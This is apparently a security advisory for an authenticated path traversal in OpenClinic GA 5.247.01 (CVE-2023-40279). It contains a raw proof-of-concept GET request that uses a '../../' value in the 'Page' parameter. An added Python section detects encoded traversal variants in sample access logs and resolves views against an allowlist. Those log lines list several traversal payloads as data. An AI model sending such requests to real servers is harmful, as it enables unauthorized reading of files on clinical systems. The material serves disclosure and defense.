OpenClinic GA 5.247.01 Path Traversal (Authenticated)

2024.04.15
Credit: V. B.
Risk: High
Local: No
Remote: Yes
CWE: CWE-22

# Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated)
# Date: 2023-08-14
# Exploit Author: V. B.
# Vendor Homepage: https://sourceforge.net/projects/open-clinic/
# Software Link: https://sourceforge.net/projects/open-clinic/
# Version: OpenClinic GA 5.247.01
# Tested on: Windows 10, Windows 11
# CVE: CVE-2023-40279

# Details

An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to 'main.do'. This vulnerability allows for the retrieval and execution of files from arbitrary directories.

# Proof of Concept (POC)

Steps to Reproduce:

1. Crafting the Malicious GET Request:
   - Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite.
   - Format the GET request as follows (in this example, `../../main.jsp` is used to attempt directory traversal to access `main.jsp`):

GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1
Host: 192.168.100.5:10088
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Connection: close
Cookie: JSESSIONID=[SESSION ID]
Cache-Control: max-age=0

2. Confirming the Vulnerability:
   - Send the crafted GET request to the target server.
   - If the server responds with the content of the requested file (e.g., `main.jsp`) from outside the intended directory, it confirms the presence of a directory path traversal vulnerability.
   - This vulnerability can lead to sensitive information disclosure or more severe attacks.
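The advisory pins the weakness to the 'Page' parameter of 'main.do'. The Python below is an added example written for this page, not code from the advisory or from the OpenClinic project. It shows the two things a defender wants from such an advisory: a detection pass over web-server access logs that flags the traversal pattern in plain, percent-encoded, double-encoded and backslash forms (the advisory's targets are Windows), and a server-side resolver that only maps the parameter to a file when the value is an allowlisted view name that canonicalizes to a direct child of the view directory. The log lines, the view directory `/webapps/openclinic/pages` and the allowlist `ALLOWED_PAGES` are constructed or hypothetical; the log format imitates a Tomcat-style access log.

```python
"""Defender-side checks for the OpenClinic GA 'Page' traversal (CVE-2023-40279).

Added example; it is not part of the advisory nor of the OpenClinic project.
The log lines, host, page directory and page allowlist are constructed or
hypothetical and only serve to exercise the two checks below.
"""
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Tomcat-style access-log lines (hypothetical traffic, not a capture).
# Lines 2-5 carry the traversal in plain, percent-encoded, double-encoded and
# backslash forms; line 1 is a legitimate request and line 6 hits another action.
SAMPLE_LOG = """\
192.168.100.5 - - [14/Aug/2023:10:01:02 +0000] "GET /openclinic/main.do?Page=main.jsp HTTP/1.1" 200 5120
192.168.100.5 - - [14/Aug/2023:10:01:07 +0000] "GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1" 200 5120
192.168.100.5 - - [14/Aug/2023:10:01:09 +0000] "GET /openclinic/main.do?Page=..%2F..%2Fmain.jsp HTTP/1.1" 200 5120
192.168.100.5 - - [14/Aug/2023:10:01:12 +0000] "GET /openclinic/main.do?Page=%252e%252e/main.jsp HTTP/1.1" 404 0
192.168.100.5 - - [14/Aug/2023:10:01:15 +0000] "GET /openclinic/main.do?Page=..\\..\\main.jsp HTTP/1.1" 200 5120
192.168.100.5 - - [14/Aug/2023:10:02:00 +0000] "GET /openclinic/patient.do?id=1 HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Hypothetical allowlist of JSP views that main.do is meant to include.
ALLOWED_PAGES = {"main.jsp", "patient.jsp"}
PAGE_DIR = "/webapps/openclinic/pages"   # hypothetical view directory


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding so %252e%252e is seen as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(page_value: str) -> bool:
    """True when the decoded Page value leaves its directory.

    Backslashes count as separators because the advisory's targets are Windows.
    """
    decoded = fully_decode(page_value).replace("\\", "/")
    if decoded.startswith("/"):
        return True                       # absolute path, not a relative view name
    depth = 0
    for part in decoded.split("/"):
        if part == "..":
            depth -= 1
            if depth < 0:
                return True               # climbed above the page directory
        elif part not in ("", "."):
            depth += 1
    return False


def page_param(target: str):
    """Return the once-decoded 'Page' value of a main.do request, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/main.do"):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("Page")
    return values[0] if values else None


def scan_log(text: str):
    """Detection: (line number, Page value) for every traversing main.do request."""
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        page = page_param(match.group("target"))
        if page is not None and is_traversal(page):
            hits.append((number, page))
    return hits


def resolve_page(page_value: str, base: str = PAGE_DIR):
    """Mitigation: map a Page value to a file only if it is an allowlisted view
    that canonicalizes to a direct child of `base`; otherwise return None."""
    name = fully_decode(page_value).replace("\\", "/")
    candidate = posixpath.normpath(posixpath.join(base, name))
    if posixpath.dirname(candidate) != base:
        return None                       # escaped the view directory (or a subdir)
    if posixpath.basename(candidate) not in ALLOWED_PAGES:
        return None                       # not a view the application exposes
    return candidate


if __name__ == "__main__":
    for number, page in scan_log(SAMPLE_LOG):
        print(f"line {number}: traversal in Page={page!r}")
    print(resolve_page("main.jsp"), resolve_page("../../main.jsp"))
```

The detection decodes more than once on purpose: a single `unquote` would leave the double-encoded request on line 4 looking harmless. The resolver does not try to "clean" the value; it canonicalizes and then refuses anything that is not an exact allowlisted child of the view directory, which is the fix a servlet-side include dispatcher should apply regardless of how the parameter was encoded.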


Copyright 2024, cxsecurity.com
